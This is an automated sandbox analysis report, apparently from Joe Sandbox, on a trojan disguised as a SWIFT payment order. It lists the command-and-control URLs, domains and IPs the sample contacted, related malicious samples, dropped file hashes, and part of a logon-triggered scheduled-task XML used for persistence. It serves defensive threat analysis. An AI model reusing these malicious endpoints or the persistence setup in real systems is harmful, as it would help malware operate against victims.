          http://www.hpsaddlerock.com/46uq/?3fQ0Khi=bs9J1aeGn7//rC5/XQ3RZfL5fo+K3BeziJUGIjAdanx1gP9H8FkBLk3VYXo90D5B+GRs&j0=SFN8Rxuh3100%Avira URL Cloudmalware
          http://www.wamhsh.com/46uq/?3fQ0Khi=Ue3PnYf+WtitO9Jkut75Ma3k2TKhCZznjjMu1kid5hA29ktIECD3KZ7svhzldzsG+GSp&j0=SFN8Rxuh30%Avira URL Cloudsafe
          http://www.aarondecker.online/46uq/?j0=SFN8Rxuh3&3fQ0Khi=IBlQMs5j29CKqlv3/eZQ6Z47udTwmev2IX+bwOiN2E8lumQwhRgtDV6FzU7U1t+cHC/Y0%Avira URL Cloudsafe
          www.liberia-infos.net/46uq/100%Avira URL Cloudmalware
          http://www.pyjama-france.com/46uq/?j0=SFN8Rxuh3&3fQ0Khi=KgIlRYVH25tNYqbEG8kO4R44bHZw5lHi55V8k/E4GGeqoND16iqE+SGGf+ZfndkYvzRB0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          webredir.vip.gandi.net
          217.70.184.50
          truefalse
            high
            www.oki-net.com
            154.196.11.204
            truetrue
              unknown
              hpsaddlerock.com
              34.102.136.180
              truefalse
                unknown
                www.wamhsh.com
                156.226.250.165
                truetrue
                  unknown
                  www.aarondecker.online
                  209.17.116.163
                  truetrue
                    unknown
                    shops.myshopify.com
                    23.227.38.74
                    truetrue
                      unknown
                      www.innovativepropsolutions.com
                      unknown
                      unknowntrue
                        unknown
                        www.754711.com
                        unknown
                        unknowntrue
                          unknown
                          www.pyjama-france.com
                          unknown
                          unknowntrue
                            unknown
                            www.hpsaddlerock.com
                            unknown
                            unknowntrue
                              unknown
                              www.elderlycareacademy.com
                              unknown
                              unknowntrue
                                unknown
                                www.blueharepress.com
                                unknown
                                unknowntrue
                                  unknown

                                  Contacted URLs

                                  NameMaliciousAntivirus DetectionReputation
                                  http://www.hpsaddlerock.com/46uq/?3fQ0Khi=bs9J1aeGn7//rC5/XQ3RZfL5fo+K3BeziJUGIjAdanx1gP9H8FkBLk3VYXo90D5B+GRs&j0=SFN8Rxuh3false
                                  • Avira URL Cloud: malware
                                  unknown
                                  http://www.wamhsh.com/46uq/?3fQ0Khi=Ue3PnYf+WtitO9Jkut75Ma3k2TKhCZznjjMu1kid5hA29ktIECD3KZ7svhzldzsG+GSp&j0=SFN8Rxuh3true
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.aarondecker.online/46uq/?j0=SFN8Rxuh3&3fQ0Khi=IBlQMs5j29CKqlv3/eZQ6Z47udTwmev2IX+bwOiN2E8lumQwhRgtDV6FzU7U1t+cHC/Ytrue
                                  • Avira URL Cloud: safe
                                  unknown
                                  www.liberia-infos.net/46uq/true
                                  • Avira URL Cloud: malware
                                  low
                                  http://www.pyjama-france.com/46uq/?j0=SFN8Rxuh3&3fQ0Khi=KgIlRYVH25tNYqbEG8kO4R44bHZw5lHi55V8k/E4GGeqoND16iqE+SGGf+ZfndkYvzRBtrue
                                  • Avira URL Cloud: safe
                                  unknown

                                  URLs from Memory and Binaries

                                  NameSourceMaliciousAntivirus DetectionReputation
                                  https://shop.gandi.net/en/domain/transferhelp.exe, 00000014.00000002.507665778.00000000035F2000.00000004.00020000.sdmpfalse
                                    high
                                    https://www.gandi.net/enhelp.exe, 00000014.00000002.507665778.00000000035F2000.00000004.00020000.sdmpfalse
                                      high
                                      https://shop.gandi.net/en/domain/suggest?search=elderlycareacademy.com&amp;source=parkinghelp.exe, 00000014.00000002.507665778.00000000035F2000.00000004.00020000.sdmpfalse
                                        high
                                        https://news.gandi.net/enhelp.exe, 00000014.00000002.507665778.00000000035F2000.00000004.00020000.sdmpfalse
                                          high
                                          https://www.gandi.net/en/securityhelp.exe, 00000014.00000002.507665778.00000000035F2000.00000004.00020000.sdmpfalse
                                            high
                                            https://www.gandi.net/en/simple-hostinghelp.exe, 00000014.00000002.507665778.00000000035F2000.00000004.00020000.sdmpfalse
                                              high
                                              https://www.gandi.net/en/cloudhelp.exe, 00000014.00000002.507665778.00000000035F2000.00000004.00020000.sdmpfalse
                                                high
                                                https://www.gandi.net/en/domainhelp.exe, 00000014.00000002.507665778.00000000035F2000.00000004.00020000.sdmpfalse
                                                  high
                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameTT_SWIFT_Export Order_noref S10SMG00318021.exe, 00000000.00000002.263450761.0000000002C71000.00000004.00000001.sdmpfalse
                                                    high
                                                    https://help.gandi.net/enhelp.exe, 00000014.00000002.507665778.00000000035F2000.00000004.00020000.sdmpfalse
                                                      high
                                                      https://whois.gandi.net/en/results?search=elderlycareacademy.comhelp.exe, 00000014.00000002.507665778.00000000035F2000.00000004.00020000.sdmpfalse
                                                        high
                                                        https://shop.gandi.net/enhelp.exe, 00000014.00000002.507665778.00000000035F2000.00000004.00020000.sdmpfalse
                                                          high

                                                          Contacted IPs

                                                          • No. of IPs < 25%
                                                          • 25% < No. of IPs < 50%
                                                          • 50% < No. of IPs < 75%
                                                          • 75% < No. of IPs

                                                          Public

                                                          IPDomainCountryFlagASNASN NameMalicious
                                                          23.227.38.74
                                                          shops.myshopify.comCanada
                                                          13335CLOUDFLARENETUStrue
                                                          34.102.136.180
                                                          hpsaddlerock.comUnited States
                                                          15169GOOGLEUSfalse
                                                          156.226.250.165
                                                          www.wamhsh.comSeychelles
                                                          136800XIAOZHIYUN1-AS-APICIDCNETWORKUStrue
                                                          209.17.116.163
                                                          www.aarondecker.onlineUnited States
                                                          55002DEFENSE-NETUStrue

                                                          General Information

                                                          Joe Sandbox Version:34.0.0 Boulder Opal
                                                          Analysis ID:528704
                                                          Start date:25.11.2021
                                                          Start time:17:29:12
                                                          Joe Sandbox Product:CloudBasic
                                                          Overall analysis duration:0h 10m 23s
                                                          Hypervisor based Inspection enabled:false
                                                          Report type:light
                                                          Sample file name:TT_SWIFT_Export Order_noref S10SMG00318021.exe
                                                          Cookbook file name:default.jbs
                                                          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                          Number of analysed new started processes analysed:33
                                                          Number of new started drivers analysed:0
                                                          Number of existing processes analysed:0
                                                          Number of existing drivers analysed:0
                                                          Number of injected processes analysed:1
                                                          Technologies:
                                                          • HCA enabled
                                                          • EGA enabled
                                                          • HDC enabled
                                                          • AMSI enabled
                                                          Analysis Mode:default
                                                          Analysis stop reason:Timeout
                                                          Detection:MAL
                                                          Classification:mal100.troj.evad.winEXE@16/10@9/4
                                                          EGA Information:Failed
                                                          HDC Information:
                                                          • Successful, ratio: 22.7% (good quality ratio 20.6%)
                                                          • Quality average: 73.2%
                                                          • Quality standard deviation: 31.2%
                                                          HCA Information:
                                                          • Successful, ratio: 98%
                                                          • Number of executed functions: 0
                                                          • Number of non-executed functions: 0
                                                          Cookbook Comments:
                                                          • Adjust boot time
                                                          • Enable AMSI
                                                          • Found application associated with file extension: .exe
                                                          Warnings:
                                                          Show All
                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WerFault.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe
                                                          • Excluded IPs from analysis (whitelisted): 131.253.33.200, 13.107.22.200
                                                          • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, www.bing.com, dual-a-0001.dc-msedge.net, client.wns.windows.com, fs.microsoft.com, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, www-bing-com.dual-a-0001.a-msedge.net, ctldl.windowsupdate.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
                                                          • Not all processes where analyzed, report is missing behavior information
                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                          • VT rate limit hit for: /opt/package/joesandbox/database/analysis/528704/sample/TT_SWIFT_Export Order_noref S10SMG00318021.exe

                                                          Simulations

                                                          Behavior and APIs

                                                          TimeTypeDescription
                                                          17:30:04API Interceptor91x Sleep call for process: TT_SWIFT_Export Order_noref S10SMG00318021.exe modified
                                                          17:30:11API Interceptor67x Sleep call for process: powershell.exe modified

                                                          Joe Sandbox View / Context

                                                          IPs

                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                          23.227.38.74Swift Copy TT.docGet hashmaliciousBrowse
                                                          • www.raeofsunshinetn.com/x2bt/?RnYXZ=3UHTyQ9dQAmpbu3mQhG83SStnEqeJbC9ZiatD7nfsnFlwu2f+wNEgjCNUlF0v2Ue2O2RqA==&5jC=cjAPxlG0yV-H52L0
                                                          DHL_AWB_DOCUMENT___pdf.exeGet hashmaliciousBrowse
                                                          • www.naplesvalleywebdesign.com/ubw4/?m6mP3=YfEDkZ7h&7nL0b=OLCg+iNjQ4/5CKIH/4vO2UNf4eQcTmxIlYL0xT/6lXMkKfqDh4KFSBJruaZMzSABrGYI
                                                          1HT42224.xlsxGet hashmaliciousBrowse
                                                          • www.jhh-machines.com/znhk/?Vb=mZfX&uPkpIRL=0xZK/FtEi0PeovZ2RYDPSq4snltWgv1hKf3vVoDfj8YtoTA3OTHL8R131dAJBqZq2ef0IQ==
                                                          IAENMAI.xlsxGet hashmaliciousBrowse
                                                          • www.infinitecraftsanddesigns.com/rf5o/?rtc=uM4k2NTciReG+vb6o0FB4IMDgIadwcn6ey2KgF2WRfsLAv1imRtN3/cn/KcgKiMf2CZBYw==&lDHXg=alO4P2kXOFQl
                                                          Payment Swift 101,647.09.exeGet hashmaliciousBrowse
                                                          • www.alexanderpaddles.ca/hd6y/?UdC=7nyl2RZ0oBMpU8D&e2=Xmm/XwOf7drKQgtmJLfbZ/Bd8FZ+HU1dqhyukUWSpvePJaXqbGyRUp80PuyB5n9Xynbk
                                                          Requested payment Swift.xlsxGet hashmaliciousBrowse
                                                          • www.khaimzcollection.com/ky0y/?nF=w4/Gb35aQ2v07eTP0YdCOCamY1/kKgps7nouqKKmK3i3Pi6PWal2T/ea8RMKeI47BYQXzw==&V8P8=QBKT9Tf
                                                          vbc (1).exeGet hashmaliciousBrowse
                                                          • www.ribbonofficial.com/fqiq/?2dO8g=MhZqZeIh1bEx9EPhBOs++VNt6zdxCxYLlsX+VD+R30361cyojbkVOC5VQe5O7hCcQbY9RgXjvg==&r0D034=9rCDgnnPXb
                                                          xpbSY3omz8.exeGet hashmaliciousBrowse
                                                          • www.infinitecraftsanddesigns.com/rf5o/?_B=uM4k2NTZiWeC+/X2q0FB4IMDgIadwcn6eyua8GqXV/sKAeZkhB8Bh7kl8vw2OyIs9BEx&w2Jhqn=S8-lp4npvnw
                                                          DHL express 5809439160_pdf.exeGet hashmaliciousBrowse
                                                          • www.xpressionsuk.com/asva/?0DHp3RF=FEQ/g93PZwAGQBEWi03pvor/xbPGdxzgRh/7BIeeyGVh6aLQ2fAt9EmS5cGut29us0ZSVvlKIQ==&hDKd=6lCpHHY0e2F0o
                                                          VSL_MV SEA-BLUE SHIP OWNERS.exeGet hashmaliciousBrowse
                                                          • www.petrestore.online/e8ia/?m0D8S=cRcPqDD8gRHP&3f0LiN=CNinYZfQbjuod4YtrGInxzMdpYuWjUUdL2k/U+JDvXlrF1AhCr50TzviVSUsxeoK3q9p
                                                          Shipment_21HT42223.exeGet hashmaliciousBrowse
                                                          • www.mybotanicalhome.com/znhk/?E8IxGN=PJEdJ8Kp32L&HXOTxB=nWDeKNlJ0lPd9WhgdUtayFSXx/Q226k1esXP2ML4lVJyrOJMzKeWbCVd34XYwJkEuNBGd7akmA==
                                                          Payment Swift Copy Of #U00a362,271.03.exeGet hashmaliciousBrowse
                                                          • www.alexanderpaddles.ca/hd6y/?2dQXRL=Xmm/XwOf7drKQgtmJLfbZ/Bd8FZ+HU1dqhyukUWSpvePJaXqbGyRUp80PuyB5n9Xynbk&n8HdXx=RhULbLA0f
                                                          DHL_AWB_NO#907853880911.exeGet hashmaliciousBrowse
                                                          • www.makheads.com/fl9w/?mfo=0pTLOHR&dFQ=2frggoHQAmdTpo/+PqnEOhc+P0KLimADn2Mb/WTE7JG8AaE973b8bWQ7k95u+MSXEt4c
                                                          PO.NX-48940.xlsxGet hashmaliciousBrowse
                                                          • www.superdrawme.com/s9m3/?zB=+cLzK+rH6VX68JQCgdg6kQaI+oShl9X2DEeuJuMbdgyHPh+PdkZ1oBpZ5YVSS1hKg1B5ug==&0r=6lgtZdm8X4
                                                          wnRWWNwExD.exeGet hashmaliciousBrowse
                                                          • www.aoptuning.com/hicp/?9r=rvzQ6ICtD+MCRvqsH1aCoknmPJXGWr41wv774t1TU/WxQLSrVImSb68bZvexfspSSh9v&j8=4hRlM
                                                          SecuriteInfo.com.Trojan.Siggen15.46065.1499.exeGet hashmaliciousBrowse
                                                          • www.nine8culture.com/b62n/?k0GX=83F4fp1yruZnroW/kOIvr3sB5hYbb/6s2QnA4UYh8g2M2/1PMJPaF6rzqscjBlb2rtAd&s0=TfNLPvVpC4-lSFx
                                                          INVOICE BL DRAFT SHIPMENT DOCUMENTS PDF.exeGet hashmaliciousBrowse
                                                          • www.wickdawaycandles.com/c250/?4h=643Oymddn+tcb0q5RBNWv1SrT+yivvZEWmQSxgyhu8rxtyEhqtCiIwUEkbJMDkSghPiY&mZ1DoP=gvYLLbaxEP
                                                          PALMETTO STATE PARTS98_xlxs.exeGet hashmaliciousBrowse
                                                          • www.cabenomeubolso.com/cfb2/?DxlpdHd=F4ktUxUTF49fVWxPewWbXeqCMpTs0aD101LFFtI8a+Hr9ygfoztDMXMnCJVbN9+YV18z&N0D=p2MxC01
                                                          doc028750_029.exeGet hashmaliciousBrowse
                                                          • www.commit2kindness.com/s4st/?aN90b=KVyLR83p1hG&Bz=DmuGwal32oLBULuuGoSJ8BTZBpJ+GiOdNAPYh2kZcU8TtmEMwc/RVFdJ73fmYN9v5+B4
                                                          vGULtWc6Jh.exeGet hashmaliciousBrowse
                                                          • www.luxonealbery.com/scb0/?q6h=5jxdANKPGHO8HP5p&NBZ4cP=MCXI1I/kHZXMM3ei1jUWMR7W3vbdlGG8P75nDyYDpYJ4VysOTGBqhV+zBBRFwJxKfpELNUrugQ==

                                                          Domains

                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                          webredir.vip.gandi.netIncorrect_Payment Details MT144_SWIFT.exeGet hashmaliciousBrowse
                                                          • 217.70.184.50
                                                          Besjuju.exeGet hashmaliciousBrowse
                                                          • 217.70.184.50
                                                          DuxgwH47QB.exeGet hashmaliciousBrowse
                                                          • 217.70.184.50
                                                          Company profile.exeGet hashmaliciousBrowse
                                                          • 217.70.184.50
                                                          SOA & INV FOR OCT'21.exeGet hashmaliciousBrowse
                                                          • 217.70.184.50
                                                          Drawings HQ30-DM140.exeGet hashmaliciousBrowse
                                                          • 217.70.184.50
                                                          Drawings HQ30-DM140.exeGet hashmaliciousBrowse
                                                          • 217.70.184.50
                                                          ZFPpWtPkYW.exeGet hashmaliciousBrowse
                                                          • 217.70.184.50
                                                          file0_stage3.dllGet hashmaliciousBrowse
                                                          • 217.70.184.50
                                                          Port_UETQYDYA_99381,pdf.exeGet hashmaliciousBrowse
                                                          • 217.70.184.50
                                                          D4L4075.exeGet hashmaliciousBrowse
                                                          • 217.70.184.50
                                                          E1PGk0W2AH.exeGet hashmaliciousBrowse
                                                          • 217.70.184.50
                                                          Purchase Order.docGet hashmaliciousBrowse
                                                          • 217.70.184.50
                                                          REQUEST FOR QUOTATION (2).exeGet hashmaliciousBrowse
                                                          • 217.70.184.50
                                                          Diagram and Specifications.exeGet hashmaliciousBrowse
                                                          • 217.70.184.50
                                                          Br5q8mvTpP.exeGet hashmaliciousBrowse
                                                          • 217.70.184.50
                                                          ckx3O50hMB.exeGet hashmaliciousBrowse
                                                          • 217.70.184.50
                                                          vkASLnL3Q6.exeGet hashmaliciousBrowse
                                                          • 217.70.184.50
                                                          ETC 813 TXG-PKG_CFS_SO0704_(Arsen_LOGISTICS),pdf.exeGet hashmaliciousBrowse
                                                          • 217.70.184.50
                                                          E20210917ML-RFQ.exeGet hashmaliciousBrowse
                                                          • 217.70.184.50
                                                          www.oki-net.comPO_No.202201EYL-01_ABW.exeGet hashmaliciousBrowse
                                                          • 154.196.5.131
                                                          www.aarondecker.onlinePO_No.202201EYL-01_ABW.exeGet hashmaliciousBrowse
                                                          • 209.17.116.163
                                                          shops.myshopify.comSwift Copy TT.docGet hashmaliciousBrowse
                                                          • 23.227.38.74
                                                          DHL_AWB_DOCUMENT___pdf.exeGet hashmaliciousBrowse
                                                          • 23.227.38.74
                                                          1HT42224.xlsxGet hashmaliciousBrowse
                                                          • 23.227.38.74
                                                          IAENMAI.xlsxGet hashmaliciousBrowse
                                                          • 23.227.38.74
                                                          Payment Swift 101,647.09.exeGet hashmaliciousBrowse
                                                          • 23.227.38.74
                                                          LlDlHiVEJQ.exeGet hashmaliciousBrowse
                                                          • 23.227.38.74
                                                          Requested payment Swift.xlsxGet hashmaliciousBrowse
                                                          • 23.227.38.74
                                                          vbc (1).exeGet hashmaliciousBrowse
                                                          • 23.227.38.74
                                                          xpbSY3omz8.exeGet hashmaliciousBrowse
                                                          • 23.227.38.74
                                                          DHL express 5809439160_pdf.exeGet hashmaliciousBrowse
                                                          • 23.227.38.74
                                                          VSL_MV SEA-BLUE SHIP OWNERS.exeGet hashmaliciousBrowse
                                                          • 23.227.38.74
                                                          Shipment_21HT42223.exeGet hashmaliciousBrowse
                                                          • 23.227.38.74
                                                          Payment Swift Copy Of #U00a362,271.03.exeGet hashmaliciousBrowse
                                                          • 23.227.38.74
                                                          DHL_AWB_NO#907853880911.exeGet hashmaliciousBrowse
                                                          • 23.227.38.74
                                                          PO.NX-48940.xlsxGet hashmaliciousBrowse
                                                          • 23.227.38.74
                                                          wnRWWNwExD.exeGet hashmaliciousBrowse
                                                          • 23.227.38.74
                                                          Purchase Order#4250008195-HK.exeGet hashmaliciousBrowse
                                                          • 23.227.38.74
                                                          SecuriteInfo.com.Trojan.Siggen15.46065.1499.exeGet hashmaliciousBrowse
                                                          • 23.227.38.74
                                                          INVOICE BL DRAFT SHIPMENT DOCUMENTS PDF.exeGet hashmaliciousBrowse
                                                          • 23.227.38.74
                                                          PALMETTO STATE PARTS98_xlxs.exeGet hashmaliciousBrowse
                                                          • 23.227.38.74

                                                          ASN

                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                          XIAOZHIYUN1-AS-APICIDCNETWORKUSWfedtqxbgeorkwcgiehsnsjbdjghrpjtlr.exeGet hashmaliciousBrowse
                                                          • 156.234.200.116
                                                          202111161629639000582.exeGet hashmaliciousBrowse
                                                          • 45.207.76.141
                                                          Hilix.armGet hashmaliciousBrowse
                                                          • 156.234.152.216
                                                          beamer.x86-20211121-1750Get hashmaliciousBrowse
                                                          • 154.210.135.132
                                                          eh.armGet hashmaliciousBrowse
                                                          • 154.210.135.122
                                                          rfq.exeGet hashmaliciousBrowse
                                                          • 156.234.44.55
                                                          Remittance advice 901EURO.exeGet hashmaliciousBrowse
                                                          • 156.234.44.51
                                                          nQStEX9iHaGet hashmaliciousBrowse
                                                          • 156.255.211.0
                                                          9B6EN8PxhHGet hashmaliciousBrowse
                                                          • 156.253.91.151
                                                          yakuza.x86Get hashmaliciousBrowse
                                                          • 156.253.91.147
                                                          Q2kiLXP4ArGet hashmaliciousBrowse
                                                          • 156.253.103.122
                                                          Company profile.exeGet hashmaliciousBrowse
                                                          • 45.207.77.147
                                                          b3astmode.armGet hashmaliciousBrowse
                                                          • 156.241.35.12
                                                          B5DfmI0PggGet hashmaliciousBrowse
                                                          • 156.234.199.246
                                                          RrK5IgZ6gZGet hashmaliciousBrowse
                                                          • 154.83.228.102
                                                          SQFoFeC1jQGet hashmaliciousBrowse
                                                          • 156.241.59.20
                                                          CBiVdAR3cZ.exeGet hashmaliciousBrowse
                                                          • 156.253.123.158
                                                          zJqtqFt8jvGet hashmaliciousBrowse
                                                          • 154.210.135.122
                                                          rXFu2DZdQqGet hashmaliciousBrowse
                                                          • 103.43.15.111
                                                          8596241.exeGet hashmaliciousBrowse
                                                          • 156.234.44.45
                                                          CLOUDFLARENETUSTxIDbatch#7809.htmGet hashmaliciousBrowse
                                                          • 104.16.18.94
                                                          Se adjunta el pedido, proforma.exeGet hashmaliciousBrowse
                                                          • 162.159.134.233
                                                          Google_Play_Store_flow_split.apkGet hashmaliciousBrowse
                                                          • 104.21.4.48
                                                          Statement.htmlGet hashmaliciousBrowse
                                                          • 104.16.18.94
                                                          Employee payment plan.HTMGet hashmaliciousBrowse
                                                          • 104.18.10.207
                                                          S9yf6BkjhTQUbHE.exeGet hashmaliciousBrowse
                                                          • 172.67.178.31
                                                          Halbank Ekstre 2021101 073653 270424.exeGet hashmaliciousBrowse
                                                          • 172.67.188.154
                                                          yH8giB6jJ2.exeGet hashmaliciousBrowse
                                                          • 162.159.135.233
                                                          pwY5ozOzpYGet hashmaliciousBrowse
                                                          • 172.64.209.6
                                                          Zr26f1rL6r.exeGet hashmaliciousBrowse
                                                          • 104.21.76.223
                                                          VXsVZBllD099876.exeGet hashmaliciousBrowse
                                                          • 172.67.206.244
                                                          OPKyR75fJn.exeGet hashmaliciousBrowse
                                                          • 104.21.50.241
                                                          COMPROBANTE DE CONSIGNACION #0000012992-882383393293293.vbsGet hashmaliciousBrowse
                                                          • 172.67.68.88
                                                          DOC20212411003001001.exeGet hashmaliciousBrowse
                                                          • 104.21.19.200
                                                          V-M RTAmpcapital5EG1-TGQO2F-IOC8.htmGet hashmaliciousBrowse
                                                          • 104.16.19.94
                                                          AO7gki3UTr.exeGet hashmaliciousBrowse
                                                          • 162.159.129.233
                                                          6docs'pdf.ppamGet hashmaliciousBrowse
                                                          • 104.16.202.237
                                                          Product Inquiry.exeGet hashmaliciousBrowse
                                                          • 66.235.200.147
                                                          JUSTIFICANTE.exeGet hashmaliciousBrowse
                                                          • 104.21.29.122
                                                          Purchase Order.exeGet hashmaliciousBrowse
                                                          • 162.159.133.233

                                                          JA3 Fingerprints

                                                          No context

                                                          Dropped Files

                                                          No context

                                                          Created / dropped Files

                                                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):22172
                                                          Entropy (8bit):5.604663680796553
                                                          Encrypted:false
                                                          SSDEEP:384:5tCDqiw55+8+L3p/mQ9RX+ReBS0n4jultI277Y9gxSJ3xCT1MabZlbAV7tNiWDWi:ZAL3p/mMNT4CltJfxcQCqfwBNQVq
                                                          MD5:5FB1F2A73499F0915A78C3AC50BE1B07
                                                          SHA1:8EE5A7E5FB66313371ECD18C20196F695F18D3CB
                                                          SHA-256:F033460017CB192F6AFA7E662803081BA0612D827432B9275B692E9FBDB6F5E3
                                                          SHA-512:18E7B1070994BB1A2C29160847D24B06D2BFBEA2B19343DA76D5BB67F7348188488DB16A6D490CF14D7D8C379B30D86EEDD9CEDE042CFC213BA212F6238DCD7D
                                                          Malicious:false
                                                          Reputation:low
                                                          Preview: @...e...........`.......h...X.N.K.........I..........@..........H...............<@.^.L."My...:<..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)........System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.....#.......System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins
                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0ic10stv.gry.ps1
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:U:U
                                                          MD5:C4CA4238A0B923820DCC509A6F75849B
                                                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                          Malicious:false
                                                          Reputation:high, very likely benign file
                                                          Preview: 1
                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_c3vwogde.4ck.ps1
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:U:U
                                                          MD5:C4CA4238A0B923820DCC509A6F75849B
                                                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                          Malicious:false
                                                          Preview: 1
                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xt5nzkl2.tah.psm1
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:U:U
                                                          MD5:C4CA4238A0B923820DCC509A6F75849B
                                                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                          Malicious:false
                                                          Preview: 1
                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ys5lr1qk.smh.psm1
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:U:U
                                                          MD5:C4CA4238A0B923820DCC509A6F75849B
                                                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                          Malicious:false
                                                          Preview: 1
                                                          C:\Users\user\AppData\Local\Temp\tmp3FD.tmp
                                                          Process:C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe
                                                          File Type:XML 1.0 document, ASCII text
                                                          Category:modified
                                                          Size (bytes):1598
                                                          Entropy (8bit):5.127424622971062
                                                          Encrypted:false
                                                          SSDEEP:24:2di4+S2qh/a1Kby1moqUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNt2Kxvn:cgeCaYrFdOFzOzN33ODOiDdKrsuT3v
                                                          MD5:073226D0EFA0A26416EDDC6944D51BCC
                                                          SHA1:38A3F2287EE0FEF6BCD822073F86465BC07A0410
                                                          SHA-256:72B3E02ACCA5893BA29C7A20D4A175DCD624EB47A5CF4EB5EC7281CA527209BF
                                                          SHA-512:B4C4451521729895619F73628547E570EAD1C4C55B6307DF6CFC0F798888817A93324C99624C5732FAB96124CAC53B5A4A61A5C320B43D40E527442238064D1D
                                                          Malicious:true
                                                          Preview: <?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>computer\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>computer\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>computer\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>.
                                                          C:\Users\user\AppData\Roaming\AnsPejV.exe
                                                          Process:C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe
